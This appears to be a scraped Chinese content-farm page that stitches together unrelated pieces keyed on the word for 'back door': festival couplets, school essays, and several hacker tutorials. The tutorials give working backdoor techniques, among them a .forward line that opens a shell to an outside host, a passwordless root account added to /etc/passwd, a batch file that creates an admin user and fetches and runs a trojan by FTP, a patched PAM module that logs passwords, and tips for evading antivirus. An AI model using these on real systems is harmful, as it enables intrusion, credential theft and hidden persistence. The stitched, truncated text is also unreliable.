下联：邀八面友朋，共商繁荣前景。

横批：纳福兆吉

上联：撷金揽银，瑞气昂扬春常在；

下联：盘旧谋新，祥云澎湃福永存。

横批：诸事顺风

上联：拢天地韶华，祈四季花开，福来运到；

下联：接远近瑞气，纳八面祥来，功成梦圆。

上联：勤羊辞旧千家同喜

下联：顽猴闹春万户皆福

横批：四海同春

上联：大鹏展翅蓬雀心惊

下联：金猴骋日魑魅难藏

横批：鹏程万里

上联：羊随新风辞旧岁

下联：猴节正气报新春

横批：万象更新

上联：勤羊辞旧千家同喜

下联：顽猴闹春万户皆福

横批：喜气盈门

上联：猴喜满园桃李艳

下联：岁迁遍地月光明

横批：家和万事兴

上联：羊歌盛世方报捷

下联：猴舞新春又呈祥

横批：猴年大吉

上联：辞旧岁三羊开泰

下联：迎新春六猴送安

横批：五福临门

上联：羊随新风辞旧岁

下联：猴节正气报新春

横批：欣欣向荣

上联：羊歌盛世方报捷

下联：猴舞新春又呈祥

横批：万事如意

上联：羊献银毫书捷报

下联：猴挥金捧迎新春

横批：新年快乐

上联：花果飘香美哉乐土

下联：猴年增色岂换人间

横批：幸福人家

上联：绿竹别其三分景

下联：红梅正报万家春

横批：春回大地

上联：年年顺景则源广

下联：岁岁平安福寿多

横批：吉星高照

上联：五更分两年年年称心

下联：一夜连两岁岁岁如意

横批：恭贺新春

上联：五湖四海皆春色

下联：万水千山尽得辉

横批：万象更新

上联：喜居宝地千年旺

下联：福照家门万事兴

横批：喜迎新春

上联：喜滋滋迎新年

下联：笑盈盈辞旧岁

上联：天增岁月人增寿

下联：春满乾坤福满楼

横批：四季长安

上联：一帆风顺吉星到

下联：万事如意福临门

横批：财源广进

上联：一帆风顺年年好

下联：万事如意步步高

上联：一干二净除旧习

下联：五讲四美树新风

横批：辞旧迎春

上联：一年好运随春到

下联：四季彩云滚滚来

横批：万事如意

上联：一年四季春常在

下联：万紫千红永开花

上联：一年四季行好运

下联：八方财宝进家门

横批：家和万事兴

上联：悠悠乾坤共老

下联：昭昭日月争光

横批：欢度佳节

上联：佳节迎春春生笑脸

下联：丰收报喜喜上眉梢

横批：喜笑颜开

上联：春满人间百花吐艳

下联：福临小院四季常安

横批：欢度春节

上联：百世岁月当代好

下联：千古江山今朝新

上联：百年天地回元气

下联：一统山河际太平

横批：国泰民安

上联：春雨丝丝润万物

下联：红梅点点绣千山

横批：春意盎然

上联：红梅含苞傲冬雪

下联：绿柳吐絮迎新春

上联：日出江花红胜火

下联：春来江水绿如蓝

横批：鸟语花香

上联：春满人间欢歌阵阵

下联：福临门第喜气洋洋

横批：五福四海

上联：春临大地百花艳

下联：节至人间万象新

上联：福星高照全家福

下联：春光耀辉满堂春

上联：事事如意大吉祥

下联：家家顺心永安康

横批：四季兴隆

上联：春色明媚山河披锦绣

下联：华夏腾飞祖国万年轻

横批：山河壮丽

上联：迎新春江山锦绣

下联：辞旧岁事泰辉煌

上联：旧岁又添几个喜

下联：新年更上一层楼

横批：辞旧迎新

上联：东风化雨山山翠

下联：政策归心处处春

横批：春风化雨

上联：家过小康欢乐日

下联：春回大地艳阳天

横批：人心欢畅

上联：多劳多得人人乐

下联：丰产丰收岁岁甜

横批：形势喜人

上联：壮丽山河多异彩

下联：文明国度遍高风

上联：财连亨通步步高

下联：日子红火腾腾起

横批：迎春接福

上联：福旺财旺运气旺

下联：家兴人兴事业兴

横批：喜气盈门

上联：大地流金万事通

下联：冬去春来万象新

上联：大地歌唤彩云

下联：满园春关不住

横批：春色满园

上联：盛世千家乐

下联：新春百家兴

上联：千年迎新春

下联：瑞雪兆丰年

横批：年年有余

上联：欢声笑语贺新春

下联：欢聚一堂迎新年

横批：合家欢乐

上联：共享锦绣年华

下联：相伴健康天使

横批：福如东海

上联：财源滚滚随春到

下联：喜气洋洋伴福来

上联：春风入喜财入户

下联：岁月更新福满门

横批：新春大吉

上联：大顺大财大吉利

下联：新春新喜新世纪

上联：占天时地利人和

下联：取九州四海财宝

横批：财源不断

上联：高居宝地财兴旺

下联：福照家门富生辉

横批：心想事成

上联：天地和顺家添财

下联：平安如意人多福

横批：四季平安

上联：春归大地人间暖

下联：福降神州喜临门

横批：福喜盈门

上联：内外平安好运来

下联：合家欢乐财源进

上联：日日财源顺意来

下联：年年福禄随春到

上联：迎喜迎春迎富贵

下联：接财接福接平安

横批：吉祥如意

上联：创大业千秋昌盛

下联：展宏图再就辉煌

篇16：系统后门的真面目

CMP Shell 后门

Ping是通过发送和接受ICMP包检测机器活动状态的通用办法之一. 许多防火墙允许外界ping它内部的机器. 入侵者可以放数据入Ping的ICMP包, 在ping的机器间形成一个shell通道. 管理员也许会注意到Ping包暴风, 但除了他查看包内数据, 否者入侵者不会暴露.

加密连接

管理员可能建立一个sniffer试图某个访问的数据, 但当入侵者给网络通行后门加密后,就不可能被判定两台机器间的传输内容了.

Windows NT

由于Windows NT不能轻易的允许多个用户象Unix下访问一台机器, 对入侵者来说就很难闯入Windows NT,安装后门,并从那里发起攻击. 因此你将更频繁地看到广泛的来自Unix的网络攻击. 当Windows NT提高多用户技术后, 入侵者将更频繁地利用WindowsNT.如果这一天真的到来, 许多Unix的后门技术将移植到Windows N T 上, 管理员可以等候入侵者的到来. 今天, Windows NT已经有了telnet守护程序 . 通过网络通行后门, 入侵者发现在Windows NT安装它们是可行的. ( With Net work Traffic backdoors, theyarevery feasible for intruders to inst all on Windows NT. 此处该如何翻译?

:( 解决当后门技术越先进, 管理员越难于判断入侵者是否侵入后者他们是否被成功封杀 .

评估

首先要做的是积极准确的估计你的网络的脆弱性, 从而判定漏洞的存在且修复之 .许多商业工具用来帮助扫描和查核网络及系统的漏洞. 如果仅仅安装提供商的安全补丁的话,许多公司将大大提高安全性.

MD5基准线

一个系统(安全)扫描的一个重要因素是MD5校验和基准线. MD5基准线是在入侵前由干净系统建立. 一旦入侵并建立了后门再建立基准线, 那么后门也被合并进去了 .一些公司被入侵且系统被安置后门长达几个月.所有的系统备份多包含了后门. 当公司发现有并求助备份祛除后门时, 一切努力是徒劳的, 因为他们恢复系统的同时也恢复了后门. 应该在入侵发生前作好基准线的建立.

入侵检测

随着各种组织的上网和允许对自己某些机器的连接,入侵检测正变的越来越重要. 以前多数入侵检测技术是基于日志型的. 最新的入侵检测系统技术(IDS)是基于实时侦听和网络通行安全分析的. 最新的IDS技术可以浏览DNS的UDP报文, 并判断是否符合DNS协议请求. 如果数据不符合协议, 就发出警告信号? 取数据进行进一步分析. 同样的原则可以运用到ICMP包, 检查数据是否符合协议要求, 或者是否装载加密shell会话.

从CD-ROM启动

一些管理员考虑从CD-ROM启动从而消除了入侵者在CD-ROM上做后门的可能性.这种方法的问题是实现的费用和时间够企业面临的.

警告由于安全领域变化之快, 每天有新的漏洞被公布, 而入侵者正不断设计新的攻击和安置后门技术, 安枕无忧的安全技术是没有的.请记住没有简单的防御,只有不懈的努力! ( Be aware that no defense is foolproof, and that there is no substitu te for diligent attention. 此句该如何翻译? :( )

you may want to add:

forward Backdoor

On Unix machines, placing commands into the .forward file was also

a common method of regaining access. For the account ``username

a .forward file might be constructed as follows:

\\username

|“/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 -e /bin/sh”

permutations of this method include alteration of the systems mail ali ases file (most commonly located at /etc/aliases). Note that this is a simple permutation, the more advanced can run a simple script. from the forward file that can take arbitrary commands via stdin (after minor

preprocessing).

PS: The above method is also useful gaining access a companies mailhub (assuming there is a shared a home directory FS on the client and ser ver).

$#@62; Using smrsh can effectively negate this backdoor (although its quite

$#@62; possibly still a problem if you allow things like elms filter or

$#@62; procmail which can run programs themselves...).

你也许要增加:

.forward后门

Unix下在.forward文件里放入命令是重新获得访问的常用方法. 帐户usernam e 的 .forward可能设置如下:

\\username

|“/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 -e /bin/sh”

这种方法的变形包括改变系统的mail的别名文件(通常位于/etc/aliases). 注意这只是一种简单的变换. 更为高级的能够从.forward中运行简单脚本实现在标准输入执行任意命令(小部分预处理后). $#@62;利用smrsh可以有效的制止这种后门(虽然如果允许可以自运行的elms filter或 procmail$#@62;类程序, 很有可能还有问题

......)

( 此段的内容理解不深, 故付上英文, 请指教! )

你也许能用这个“特性”做后门:

当在/etc/password里指定一个错误的uid/gid后, 大多数login(1)的实现是不能检查出这个错误的uid/gid, 而atoi(3)将设uid/gid为0, 便给了超级用户的权利.

例子:

rmartin:x:x50:50:R. Martin:/home/rmartin:/bin/tcsh 在Linux里,这将把用户 rmartin的uid设为0.

篇17：教你三种后门技术

1.后门防范基本功

首先要关闭本机不用的端口或只允许指定的端口访问；其次要使用专杀木马的软件，为了有效地防范木马后门；第三是要学会对进程操作，时时注意系统运行状况，看看是否有一些不明进程正运行并及时地将不明进程终止掉，

2.安全配置Web服务器

如果公司或企业建立了主页，该如何保证自己的Web服务器的安全性呢?

首先要关闭不必要的服务；其次是建立安全账号策略和安全日志;第三是设置安全的IIS，删除不必要的IIS组件和进行IIS安全配置。

在IIS安全配置时候，要注意修改默认的“Inetpub”目录路径。可以删除C盘的“Inetpub”目录，然后在D盘重建一个“Inetpub”，而后在IIS管理器中将主目录指向新建立的“Inetpub”路径。此外，还需要删除默认的“scripts”、“print”等虚拟目录，然后在IIS管理器中删除不必要的映射，一般情况下保留ASP、ASA就可以了。

具体方法是在“IIS信息服务”管理器中右击主机名，选择“属性”→“主目录”标签，点击“高级”按钮，在“映射”标签中就可以删除不必要的映射了。另外，在属性窗口中选择“网站”标签，然后勾选“启用日志”，并选择“使用W3C扩充日志文件格式”项，每天记录客户IP地址、用户名、服务器端口、方法、URI字根、HTTP状态、用户代理等，而且每天都应审查日志。

在上面的基础工作之后，还需要设置Web站点目录的访问权限。

一般情况下，不要给予目录以写入和允许目录浏览权限，只给予，

ASP文件目录以脚本的权限，而不要给予执行权限。在“IIS信息服务”管理器中展开网站的虚拟目录，然后右键点击某个虚拟目录，选择“属性”→“虚拟目录”标签，在“本地路径”下可设置对该目录权限为“读取”或“目录浏览”等。另外也可以通过NTFS分区格式，严格地设置用户目录权限。

而针对企业中最为核心的数据，更要加强对于Access数据库下载的防护。

当使用Access作为后台数据库时，如果有人通过各种方法知道或者猜到了服务器的Access数据库的路径和数据库名称，就可以下载这个Access数据库文件，这是非常危险的。因此，一般情况下要更改默认的数据库文件名，为你的数据库文件名称起个复杂的非常规的名字，并把它放在比较深的文件目录下。另外，还可以为Access数据库文件加上打开密码。

打开IIS网站属性设置对话窗口，选择“主目录”选项卡，点击“配置”按钮，打开“应用程序配置”对话窗口。而后，点击“添加”按钮，在“可执行文件”中输入“asp.dll”，在“扩展名”中输入“。mdb”，勾选“限制为”项，并输入“禁止”，确定应用后完成设置即可。以后，当入侵者企图下载数据时，将会提示禁止访问。

最后要配置安全的SQL服务器

SQL Server是各种网站系统中使用得最多的数据库系统，一旦遭受攻击，后果是非常严重的。虽然默认的SA用户具有对SQL Server数据库操作的全部权限，但是SA账号的黩认设置为空口令，所以一定要为SA账号设置一个复杂的口令。而且，要严格控制数据库用户的权限，轻易不要给用户直接的查询、更改、插入、删除权限，可以只给用户以访问视图和执行存储过程的权限。

在选择建立网站的Web程序时一定要注意安全性。许多网站系统虽然功能强大，但由于编程人员的安全意识所至，存在着一些很严重的安全漏洞，比如常见的SQL注入漏洞、暴库等，都有可能被利用。同时，我们平时还应该做好网站服务器的数据备份，以便在出现意外时及时地进行数据恢复。

篇18：UNIX下如何创建后门

Crontab 程序对于系统管理员来说是非常有用的，

UNIX下如何创建后门

，

Cron 服务用于计划程序在特定时间（月、日、周、时、分）运行。如果你足够聪明，就应该加以利用，使之为我们制造后门！通过 Cron 服务，你可以让它在每天凌晨 2:00 （这个时候网管应该睡觉了吧。）运行后门程序

篇19：技巧留后门方法

对于我们这样的菜手，好不容易搞了台服务器很不容易，如果被发现了就惨了，

技巧留后门方法

。其实，开后门的方法有很多种，下面我来说说，我以前学习过的几种方法。

1.Setuid

#cp/bin/sh/tmp/.root

#chmodu+s/tmp/.root

加上suid位到shell上，虽然很简单，但容易被发现。

2.Echo“hack::0:0::/:/bin/csh”>>/etc/passwd

即给系统增加一个ID为0（root)的帐号，无口令，但管理员用find命令就可以发现。

3.Echo“+hack”>>/.rhosts

如果这个系统开了512、513的port，就可以。把一个名为hack加到.rhosts文件中，rlogin登陆，无须密码。

4.修改Sendmail.cf文件

增加一个“wiz”命令，然后telnetwww.xxx.com25后，wiz，这就可以了。

5.Rootkitbackdoor

这些东西现在是很火热的东西，但小心该后的文件的适用性、日期等等一些小的细节。有的需要自己编译，有的是编译好的。

6.Remoteshell

Sunx的那个backdoor就很不错，不会产生日记文件，防止who等等。需要编译，但运行在redhat6.1很不错。但在7.1等版本中好象就有点bug。

或者可以bindshell，可以替换inetd.conf中不常用的服务，注意文件的修改时间。

7.Http后门

其实，一般的防火墙对Web服务的限制少的很，所以我们可以从这里入手，这里需要用到端口重定向，

简单的说就是web开的http服务有2个，一个是http本身，一个是remoteshellbindshell。防火墙过滤其他一切port，禁止反向连接，简单的就是可以用nc。（netcat这个）把cmd.exe绑定到80端口上去。telnetwww.xxx.com80

8.Bat后门（原创）

如果是xnix服务器，没办法。

Ms服务器：

backdoor.bat

netuserhackerwindychild/add

netlocalgroupadministratorshacker/add...createsuperadminuser

echoopenc:\\ftp.txt“>www.xxx.com>c:\\ftp.txt

echoxxx>>c:\\ftp.txt

echoxxxxxx>>c:\\ftp.txt

echogetsrv.exe>>c:\\ftp.txt

echobye>>c:\\ftp.txt

ftp-s:c:\\ftp.txt

copysrv.exec:\\winnt\\

c:\\winnt\\srv.exe

delc:\\ftp.txt

delc:\\srv.exe......可以自己设置木马或后门等

....或你可以写上开启3389服务，telnet的语句

其他，开放共享服务！

netshareipc=ipc$

netsharehdc=c$

......

如果狠点的话，干脆再给它上个rootkitforwin。

9.可以利用邮件编码漏洞

自己设置一个base64的编码文件发给你的朋友，然后把后门.exe转换成邮件编码。

其实，上面的方法都是很常见的方法。还有很多方法，一时没办法整理出来，但对于新手来说足够了！

篇20：PAM后门编译安装

PAM有许多版本，我们首先要从官方下载目标所使用的PAM源码包，并在本地修改后编译生成出pam_unix.so文件进行替换

www.linux-pam.org/library/

fedorahosted.org/releases/l/i/linux-pam/

获取目标系统所使用的PAM版本：

rpm -qa|grep pam

下载后，在对应的系统环境下(32或x86_64位系统下)编译生成后门,patch目录下的“pam_unix_auth.c.patch”文件就是

补丁文件，pam_unix_auth.c 是PAM

1.1.1版本pam_unix.so的源文件，仅作参考，我们将补丁文件移动到源码目录，并使用patch命令对PAM源代码打补丁，然后编译生成即可。

mv pam_unix_auth.c.patch Linux-PAM-1.1.1/modules/pam_unix/cd Linux-PAM-1.1.1/modules/pam_unixpatch < pam_unix_auth.c.patchcd ../.././configure & make

编译完后的文件在：modules/pam_unix/.libs/pam_unix.so

后门的默认密码：root123

记录密码的文件：/tmp/pslog

将生成的pam_uninx.so文件覆盖/lib/secruity/pam_unix.so或/lib64/security/pam_unix.so(记得备份原始文件)，修改文件属性，手动建立密码保存文件，并使用touch命令克隆文件时间，如果selinux是开启的环境，一定要关掉或者设置好上下文pam_unix.so才能正常工作，搞定ok，

手动创建密码文件：

touch /tmp/pslog;chmod a+w /tmp/pslog

克隆原始文件时间：

touch pam_unix.so -r pam_unix.so.src

查看Selinux上下文：

ls -Z pam_unix.so.src (备份的原始文件)

设置Selinux上下文：

chcon –reference=pam_unix.so.src pam_unix.so

编译报错问题：

64位系统编译可能会遇到yywrap函数未定义错误，只需安装flex软件包就可以正常编译了

示例：

yum install flex

下载地址:

Linux-PAM-1.1.1官方源码.tar.gz path

1感谢乌云某个兄弟

2不要在骂我了

篇21：乔迁新居后门对联

乔迁新居后门对联

有备无患，虽设常关，

德门有后路，家业无前忧。

云路前无限，德门后有余。

太平居有后，安乐福无涯。

闭门长天无尘车，传家百代有旧书，

光前振起家声远，裕后留贻世泽长。

竹径有时风为扫，柴门无事日常关。

书卷莫教春色老，柴门不为闲人开。

柴门常闭人迹静，竹径乍忙夕阳斜。

横批：后面福临

后院漫谈好歇脚

门庭早洁待停车

篇22：巧建后门一则

准备物品:

一次性后门一个!

批处理文件一个!

前提条件,对方有开终端

批处理文件内容

======================

echo Code By N/P

copy 木马.exe %windir%\\system32\\dllcache\\magnify.exe /y

move 木马.exe %windir%\\system32\\magnify.exe /y

del %0

======================

将木马和批处理放一块.

运行批处理即可.

激活后门

=============

连接终端

按WIN+U激活放大镜即可.

版权ICEHACK所有,不得!

篇23：“幻影后门”病毒技术细节

杀毒软件不去炒作，多搞点这种文章就好了

这是一个具有感染功能、提供多种连接方式、可配置的后门病毒，

病毒作者在病毒体（客户端控制程序）内留下了明确的签名：

作者：dream2fly 作者网址： www.dream2fly.net 作者邮箱：hyrootkit@126.com

作者的网址(论坛)中提供了多个自己编写的软件，包括本后门病毒。

作者的论坛中称本病毒为UAM (Universal Access Manager)，中文名称“幻影远程控制”，提供收费注册使用。

病毒分为5个部分：服务端安装程序(ctfime.exe)、服务端核心程序(SysIdt00.dll)、服务端启动程序(被感染的explorer.exe)、客户端控制程序(UAManager.exe)、隐藏端口的Rootkit (uamanger.sys)。

服务端安装程序由C/C++语言编写，UPX加壳保护。其它部分由C/C++或汇编语言编写。

1、服务端安装程序

服务端安装程序执行如下操作：

(1) 服务端安装程序运行后从程序资源中释放如下文件：

”%windir%\\system32\\SysIdt00.dll“、”%windir%\\system32\\DRIVERS\\uamanger.sys“

(2) 然后将自己复制为”%windir%\\system32\\ctfime.exe“并启动，同时删除原文件。

(3) 将SysIdt00.dll、ctfime.exe、uamanger.sys的文件时间修改为同系统的cmd.exe相同，并将属性设置为“系统+隐藏”。

(4) 修改系统的文件保护，然后感染系统的explorer.exe。

(5) 以隐藏窗口方式启动被感染的explorer.exe。

2、服务端启动程序(被感染的explorer.exe)

服务端安装程序在感染explorer.exe时，在其最后增加一个大小为0x1000的节写入病毒代码，并将入口点改为指向新的节的开始。被感染的病毒代码执行时通过调用LoadLibraryA装载SysIdt00.dll，然后返回原入口点。病毒感染explorer.exe的目的是为了在系统启动时都能运行SysIdt00.dll，达到自启动的目的。

3、服务端核心程序(SysIdt00.dll)

SysIdt00.dll中是远端监控的核心代码。

SysIdt00.dll通过被感染的explorer.exe被装载后执行如下功能：

(1) 通过调用SeDebugPrivilege等函数提升权限。

(2) 遍历进程对找到的第一个”svchost”进程，将自己将注入其内存，然后通过CreateRemoteThread启动其导出函数”Entry”。

SysIdt00.dll被注入svchost进程后执行如下功能：

(1) 通过尝试打开名为”UAM_4803“的互斥量来检查驱动是否加载，如加载则不做其它操作。

(2) 如果驱动没有加载，根据设置(可在生成服务端时设置是否加载驱动)加载驱动”%windir%\\system32\\DRIVERS\\uamanger.sys“，

(3) 启动工作线程，实现远程监控功能。

(4) 在实现连接时，通过写文件”\\\\.\\UAM“将连接的端口传给驱动，实现隐藏端口。

(5) 根据设置的连接方式和密码连接客户端(控制端)

生成服务端时可以设置三种连接方式：

直接连接方式(设置监听，由控制端来连接服务端)

反弹连接方式1 (设置ip地址和端口，服务端去连接控制端)

反弹连接方式2 (设置网页地址，服务端从这个地址下载ip.txt,按照其内容去连接控制端)

(6) 远程控制可以接受如下命令执行操作：

远程shell (cmd.exe命令操作)

进程管理

文件管理

远程桌面

视频监控

日志管理(查看、删除系统日志)

从任意网址下载、执行文件

远程更新、卸载服务端

4、客户端控制程序(UAManager.exe)

客户端控制程序提供远程连接控制功能，并且可以生成服务端程序。

在生成服务端程序时，可以进行如下设置：

连接方式和地址、连接密码、是否加载驱动、服务端运行时间。

5、隐藏端口的Rootkit (uamanger.sys)

病毒名称为Rootkit.Win32.PortHide.a，该驱动加载后首先创建一个名为\\Device\\hypy的设备和一个名为\\??\\hypy的符号链接用来和3环程序交互。这个设备名与3环程序所使用的符号链接（\\\\.\\UAM）不同，所以显然我们所截获的样本是无法正常工作的。

之后该驱动注册IRP处理回调，在IRP_MJ_WRITE处理例程中，该驱动接受3环传入的需要隐藏的端口号，并保存在一个全局变量中。不过该Rootkit作者显然对驱动编写很不熟悉，所有的IRP处理例程均没有通过IofCompleteRequest完成，而是直接返回到I/O管理器。所以该驱动是无法正常地完成所希望实现的功能的。

该驱动通过替换KeServiceDescriptorTable中的函数地址来挂钩ZwDeviceIoControlFile，该Rootkit通过挂钩该API来隐藏指定端口。

安全建议：

1 安装正版杀毒软件、个人防火墙和卡卡上网安全助手,并及时升级，瑞星杀毒软件每天至少升级三次。

2 使用“瑞星系统安全漏洞扫描”，打好补丁，弥补系统漏洞。

3 不浏览不良网站，不随意下载安装可疑插件。

4 不接收QQ、MSN、Emial等传来的可疑文件。

5 上网时打开杀毒软件实时监控功能。

6 把网银、网游、QQ等重要软件加入到“瑞星帐号保险柜”中，可以有效保护密码安全。

清除办法：

瑞星杀毒软件清除办法：

安装瑞星杀毒软件，升级到19.44.10版以上，对电脑进行全盘扫描，按照软件提示进行操作，即可彻底查杀。

篇24：后门技术和混淆技术个人浅谈

hanxiaolian

后门我想这个大家都知道吧!就不解释了!不知道的可以问我们的百度老师!

当大家入侵主机都会给主机留后门吧!方面以后进入!可是木马是毕竟是恶意程序!就算是免杀!时间长了杀毒软件更新也会被杀的!所以要长久控制就要安装隐形后门!老鸟就飘过吧!呵呵!

下面要教大家建立无法检查的隐藏后门原理,利用开关机脚本创建属于自己的管理员账号!入侵时我们都会搞到管理员账号密码，先建立个文本输入下面的代码：

@echo off(禁止用户回显信息)

net user hxl 77169 /add

net loaclgroup administrators hxl /add

原创文章就这个麻烦代码还得自己打.....

ok了吧!保存为bat的批处理这是关机脚本下面再同理创建开机脚本

@echo off

net user hxl /del

然后点开始运行gpedit.msc 启动组策略!

展开计算机配置win配置脚本(启动关机)

点启动属性点击显示文件目录改为刚才创建的脚本

应用就生效了同理关机脚本也修改

如果肉鸡管理员是位菜鸟就可以搞定了!但是如果是位行内人士!就得换方法了!

介绍一个特殊的后门账号

让开机时不让管理员检测到我们添加账号了!

exe +h

Attrib c:\\windows\\System32\\Dllcache\\Sethc.exe +h

这个是将sethc辅助工具换成explorer

紧接着就可以使用shift后门工具了!

看来这点内容满足不了大家，下面浅谈下使用代码混淆技术免杀脚本后门，这是一种用于目标代码和软件知识产权保护的交换技术!

不会改动源程序功能! 免杀里面的花指令就是这门技术的一种!

还有这个和加密是不一样的!!大家别混了!

加密是防止未经授权使用只能非法使用

我们要讲的是混淆技术!

分为4种!!哦!

1 词法交换其实就是捣乱函数变量嘻嘻!

2 控制流交换替换循环时的代码

3 数据交换数组变量之间交换 ...

4 类结构交换

概念就这些了，

。。

具体操作呢...工具打开木马服务端

根据上面的浅谈下实践

第一种：添加垃圾代码或注释

这里就是，添加注释

”byhxl77169\"这样的垃圾代码就可以了

二语句的续行，加入空白字符

适当位置保持断行缩进即可免杀

使用下面线空格tab...还有：号差点忘了

三变量字符串函数名混淆

使用字符分割重组变化

大小改变

变量赋值

四代码段交换指令交换函数顺序改变混淆

记住要 1对1 交换哦!!!

五加密混淆

大家都知道杀毒软件，有启发式扫描技术，所以混淆属于多态技术，所以需要加密，简单的加密方法 ascll 码交换加密无效指加密、异或加密。

混淆技术相关的太多在这里不能全部说清楚!等以后慢慢说吧!

混淆学好了，免杀不错的!这里说的比较浅!适合新手学习!!

第2篇：后门-作文600字

后门-作文600字

后门

后门，开或不开都具有相同的意义，因为我在后门处，心在后门外。

——题记

后门是我一直向往的地方，因为我可以掌控它，因为我可以听见她走路的声音，因为我可以听见她讲课的声音，因为她在后门外而已。

刚刚坐到我向往已久的位子，充满无尽的遐想，幻想在她自习课时随手打开后门，可是并未想象那么美好，还要顾及别人的感受。

每一次，我轻轻打开后门，总能看见她在三四班穿梭，而每一次都能听见他温柔的声音，每一次……每一次都是这样。

一次，刚上完我所厌烦的地理课，使得我上下眼皮亲密无间，于是趴在了桌子上休息一下，等我一睁眼，巨大的`surprise——多美正在向后门走来，小巧的身体从又窄又长的通道走过来，看着异常可爱，她来听课，这是我万万没有想到的，然后急忙环顾四周，看看有没有我所记录的关于她的东西，45分钟，她坐在我旁边，心里异常的兴奋又紧张，那张熟悉的面孔，娟秀的字体在上面一个一个被记下，不知道她在偷笑什么，反正看起来很可爱，看着秒针一圈一圈的转着，心里有些着急，多么不想结束这堂课啊！可是这般模样使我又深感没有容身之处，手啊脚啊都像是多余的不知道放哪，然而，放哪都感觉不自然，当她低头记下一些东西时，趁机回头瞄一眼，她便不会发现我在做什么，如若出一个笑话，我又听见她久违的笑声，她是莲多美无人能及，她坐在那小小的角落，挨着后门和我，可是终究要下课的，当她站起身，目送她走出教室，像曲终人散般的结局，难免给人带来些伤感，而多美走了，只剩下后门和我，总感觉她还在那小小的“多美部落”。一直在。可一回头，她没在。只有一扇后门，门外依旧是那样的景色。

后门，一扇再普通不过了的门，打开它，外面的世界像水中的月亮迷人却又十分梦幻，就像轻轻触碰一下水面，这亦真亦幻的世界又不复存在了。

后门，开或不开，都具有相同的意义，不是她在门外，而是在我心里。

——后记

第3篇：后门山之春作文

后门山之春作文（共28篇）由网友 “方锵锵” 投稿提供，下面是小编帮大家整理后的后门山之春作文，希望对大家有所帮助。

篇1：后门山之春作文

一只彩色的蝴蝶把我引进了后门山，

后门山之春作文

。

“山不在高，有景则美；春不在早，有花则秀。”后山可美了！

我忍受不住自然的诱惑，去除我心爱的小提琴，无拘无束地弹奏起春光曲。这琴声，是赞美春天的歌，是赞美大自然的心声。

那迎春花、那竹笋、那琴声怎能不让我爱上春天，爱上

东湖山之春400字作文

春天来了！春姑娘迈着

未完，继续阅读 >

第4篇：关于后门的900字作文

关于后门的900字作文

后门，开或不开都具有相同的意义，因为我在后门处，心在后门外。

——题记

后门是我一直向往的地方，因为我可以掌控它，因为我可以听见她走路的声音，因为我可以听见她讲课的声音，因为她在后门外而已。

刚刚坐到我向往已久的位子，充满无尽的遐想，幻想在她自习课时随手打开后门，可是并未想象那么美好，还要顾及别人的感受。

每一次，我轻轻打开后门，总能看见她在三四班穿梭，而每一次都能听见他温柔的声音，每一次……每一次都是这样。

一次，刚上完我所厌烦的地理课，使得我上下眼皮亲密无间，于是趴在了桌子上休息一下，等我一睁眼，巨大的surprise——多美正在向后门走来，小巧的身体从又窄又长的通道走过来，看着异常可爱，她来听课，这是我万万没有想到的，然后急忙环顾四周，看看有没有我所记录的关于她的东西，45分

未完，继续阅读 >

第5篇：新年后门的对联

新年后门的对联

在日常生活和工作中，说到对联，大家肯定都不陌生吧，对联作为一种习俗，是汉族传统文化的重要组成部分。写起对联来就毫无头绪？以下是小编整理的新年后门的对联，欢迎大家借鉴与参考，希望对大家有所帮助。

1、戌死守奈良岁；亥迎接吉祥春

2、玉犬送旧岁；金猪迎新春

3、阳春臻六顺；亥岁报三多

4、戌年小康路；亥岁锦绣春

5、朱门迎接紫气；平路直奔青云

6、戌岁立宏志；亥年奔小康

7、亥时看看入户；猪岁喜盈门

8、一年春作首；六畜猪为先

9、人上开致富路；猪拱形生财门

10、义犬守门户；良豕报岁华

11、巳呼迎盛世；亥算是得低年

12、六畜猪为首；一年春占先

13、六畜猪为宝；四时春最新

14、生财猪拱户；致富燕迎春

15、亥时春入户；猪岁喜盈门

16、亥来四季美；猪献满身肥

17、农户百猪乐；神州万象新

18、守家劳玉狗；致富

未完，继续阅读 >

第6篇：新年后门的对联

新年后门的对联

在我们平凡的日常里，大家总免不了要接触或使用对联吧，对联在自身发展过程中，又吸收了古体诗、散文、词曲等的特点。对联你想好怎么写了吗？下面是小编整理的新年后门的对联，欢迎阅读，希望大家能够喜欢。

新年后门的对联1

1、上联：万户春风礼陶乐淑，三阳景运人寿年丰。

2、上联：万紫千红百花齐放，三江四海五谷丰登。

3、上联：万象更新无山不秀，一元复始有水皆清。

4、上联：万里蓝天群星灿烂，九州大地百业繁荣。

5、上联：中华崛起山河竞秀，民族振兴日月争辉。

6、上联：五环辉映奥梦圆满，十亿激昂国魂壮威。

7、上联：千树岭上千枝竞发，百姓门前百鸟争鸣。

8、上联：千花岭上千枝竞秀，百姓门前百鸟争春。

9、上联：大地回春山欢水笑，甘霖沃野柳绿花红。

10、上联：大地春回凤鸣盛世，中华崛起龙有传人。

11、上联：大地欢

未完，继续阅读 >

第7篇：后门结婚对联摘抄

后门结婚对联摘抄

最精辟的.结婚后门五字对联

上联：喜气满厅堂下联：祥光拥后庭

上联：竹风留客饮下联：松月对宾筛

上联：庭前红梅放下联：院后紫燕来

绝配横批：喜气盈门冰清意洁春光无限

最显盛情的七字后门结婚对联

上联：前庭一曲双声奏下联：后殿三秋五桂香

上联：后槽关马留佳客下联：门第惭蜗宴上宾

上联：前堂鸿禧笼华筵下联：后院福绥掩翠园

上联：后话慢谈留客住下联：复邀相聚叙亲情

上联: 门前大道飞龙马下联: 屋后崇山翥凤凰

上联：日照门前添喜气下联：花开院后吐芳馨

上联：美德光前而裕后下联：韶琴颂古又歌今

上联：门前绿水流将去下联：宅后紫莺祝贺来

上联：两扇彩门飞彩燕下联：一对红烛映红心

唯美横联推荐：户拱三星月明金屋梁孟高风花好月圆雀屏中目

日月同辉喜同登科乾坤交泰喜浴

未完，继续阅读 >

第8篇：Ginwui后门程序分析

Ginwui后门程序分析（精选8篇）由网友 “你滴岛岛” 投稿提供，以下文章小编为您整理的Ginwui后门程序分析，供大家阅读。

篇1：Ginwui后门程序分析

